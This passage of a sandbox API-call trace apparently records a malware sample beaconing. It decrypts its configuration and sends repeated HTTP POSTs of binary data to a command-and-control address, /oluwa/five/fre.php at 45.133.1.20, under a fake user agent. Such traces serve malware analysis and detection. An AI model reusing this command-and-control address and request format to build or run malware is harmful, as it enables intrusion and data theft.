binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.280] GetProcessHeap () returned 0x6a0000 [0204.280] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0204.280] GetProcessHeap () returned 0x6a0000 [0204.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0204.281] send (s=0x560, buf=0x6b5c98*, len=242, flags=0) returned 242 [0204.282] send (s=0x560, buf=0x6bb998*, len=159, flags=0) returned 159 [0204.282] GetProcessHeap () returned 0x6a0000 [0204.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0204.282] recv (in: s=0x560, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0204.357] GetProcessHeap () returned 0x6a0000 [0204.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0204.358] GetProcessHeap () returned 0x6a0000 [0204.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0204.358] GetProcessHeap () returned 0x6a0000 [0204.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0204.359] GetProcessHeap () returned 0x6a0000 [0204.359] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0204.359] closesocket (s=0x560) returned 0 [0204.360] GetProcessHeap () returned 0x6a0000 [0204.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba990 | out: hHeap=0x6a0000) returned 1 [0204.360] GetProcessHeap () returned 0x6a0000 [0204.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0204.360] GetProcessHeap () returned 0x6a0000 [0204.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0204.361] GetProcessHeap () returned 0x6a0000 [0204.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0204.362] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x570) returned 0x560 [0204.365] Sleep (dwMilliseconds=0xea60) [0204.366] GetProcessHeap () returned 0x6a0000 [0204.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0204.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.368] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.374] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0204.381] GetProcessHeap () returned 0x6a0000 [0204.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c58f8 [0204.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.382] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6c58f8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0204.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.384] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.385] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.385] GetProcessHeap () returned 0x6a0000 [0204.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c58f8 | out: hHeap=0x6a0000) returned 1 [0204.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.386] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0204.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.387] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0204.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.388] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0204.388] GetProcessHeap () returned 0x6a0000 [0204.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0204.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.390] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.391] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.397] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.398] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.398] GetProcessHeap () returned 0x6a0000 [0204.398] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0204.398] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.399] GetProcessHeap () returned 0x6a0000 [0204.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0204.399] GetProcessHeap () returned 0x6a0000 [0204.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0204.399] GetProcessHeap () returned 0x6a0000 [0204.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0204.400] GetProcessHeap () returned 0x6a0000 [0204.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0204.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.409] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0204.416] GetProcessHeap () returned 0x6a0000 [0204.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0204.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.417] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0204.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.418] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.420] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.420] GetProcessHeap () returned 0x6a0000 [0204.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0204.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.421] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0204.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.423] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0204.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.424] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0204.424] GetProcessHeap () returned 0x6a0000 [0204.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0204.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.425] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0204.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.427] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0204.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.428] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0204.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.429] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0204.429] GetProcessHeap () returned 0x6a0000 [0204.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0204.429] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0204.429] GetProcessHeap () returned 0x6a0000 [0204.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0204.429] socket (af=2, type=1, protocol=6) returned 0x564 [0204.431] connect (s=0x564, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0204.454] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0204.454] GetProcessHeap () returned 0x6a0000 [0204.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0204.455] GetProcessHeap () returned 0x6a0000 [0204.455] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0204.455] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.456] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.457] GetProcessHeap () returned 0x6a0000 [0204.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0204.457] GetProcessHeap () returned 0x6a0000 [0204.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0204.458] GetProcessHeap () returned 0x6a0000 [0204.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0204.458] GetProcessHeap () returned 0x6a0000 [0204.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0204.459] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.460] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.460] GetProcessHeap () returned 0x6a0000 [0204.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0204.460] GetProcessHeap () returned 0x6a0000 [0204.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0204.461] send (s=0x564, buf=0x6b5c98*, len=242, flags=0) returned 242 [0204.461] send (s=0x564, buf=0x6bb998*, len=159, flags=0) returned 159 [0204.461] GetProcessHeap () returned 0x6a0000 [0204.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0204.461] recv (in: s=0x564, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0204.528] GetProcessHeap () returned 0x6a0000 [0204.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0204.529] GetProcessHeap () returned 0x6a0000 [0204.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0204.530] GetProcessHeap () returned 0x6a0000 [0204.530] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0204.532] GetProcessHeap () returned 0x6a0000 [0204.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0204.533] closesocket (s=0x564) returned 0 [0204.534] GetProcessHeap () returned 0x6a0000 [0204.534] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0204.534] GetProcessHeap () returned 0x6a0000 [0204.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0204.535] GetProcessHeap () returned 0x6a0000 [0204.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0204.535] GetProcessHeap () returned 0x6a0000 [0204.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0204.536] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x754) returned 0x564 [0204.537] Sleep (dwMilliseconds=0xea60) [0204.539] GetProcessHeap () returned 0x6a0000 [0204.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0204.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.541] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.547] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0204.555] GetProcessHeap () returned 0x6a0000 [0204.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0204.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.556] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0204.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.557] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.558] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.558] GetProcessHeap () returned 0x6a0000 [0204.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0204.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.560] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0204.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.562] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0204.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.563] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0204.563] GetProcessHeap () returned 0x6a0000 [0204.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0204.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.564] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0204.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.573] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0204.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.574] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0204.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.575] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0204.575] GetProcessHeap () returned 0x6a0000 [0204.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0204.575] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0204.576] GetProcessHeap () returned 0x6a0000 [0204.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0204.576] GetProcessHeap () returned 0x6a0000 [0204.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0204.577] GetProcessHeap () returned 0x6a0000 [0204.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0204.577] GetProcessHeap () returned 0x6a0000 [0204.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0204.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0204.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0204.592] GetProcessHeap () returned 0x6a0000 [0204.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0204.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.593] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0204.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.594] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0204.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.595] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0204.596] GetProcessHeap () returned 0x6a0000 [0204.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0204.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.597] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0204.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.598] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0204.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0204.600] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0204.600] GetProcessHeap () returned 0x6a0000 [0204.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0204.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.601] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0204.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.602] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0204.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.603] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0204.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0204.604] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0204.604] GetProcessHeap () returned 0x6a0000 [0204.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0204.604] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0204.604] GetProcessHeap () returned 0x6a0000 [0204.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0204.604] socket (af=2, type=1, protocol=6) returned 0x568 [0204.605] connect (s=0x568, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0204.639] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0204.639] GetProcessHeap () returned 0x6a0000 [0204.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0204.639] GetProcessHeap () returned 0x6a0000 [0204.639] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0204.640] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.641] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0204.641] GetProcessHeap () returned 0x6a0000 [0204.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0204.641] GetProcessHeap () returned 0x6a0000 [0204.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0204.641] GetProcessHeap () returned 0x6a0000 [0204.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0204.641] GetProcessHeap () returned 0x6a0000 [0204.641] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0204.642] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0204.643] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0204.643] GetProcessHeap () returned 0x6a0000 [0204.643] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0204.643] GetProcessHeap () returned 0x6a0000 [0204.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0204.644] send (s=0x568, buf=0x6b5c98*, len=242, flags=0) returned 242 [0204.644] send (s=0x568, buf=0x6bb998*, len=159, flags=0) returned 159 [0204.644] GetProcessHeap () returned 0x6a0000 [0204.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0204.645] recv (in: s=0x568, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0204.716] GetProcessHeap () returned 0x6a0000 [0204.716] HeapFree (in: hHeap=0x6a0000, 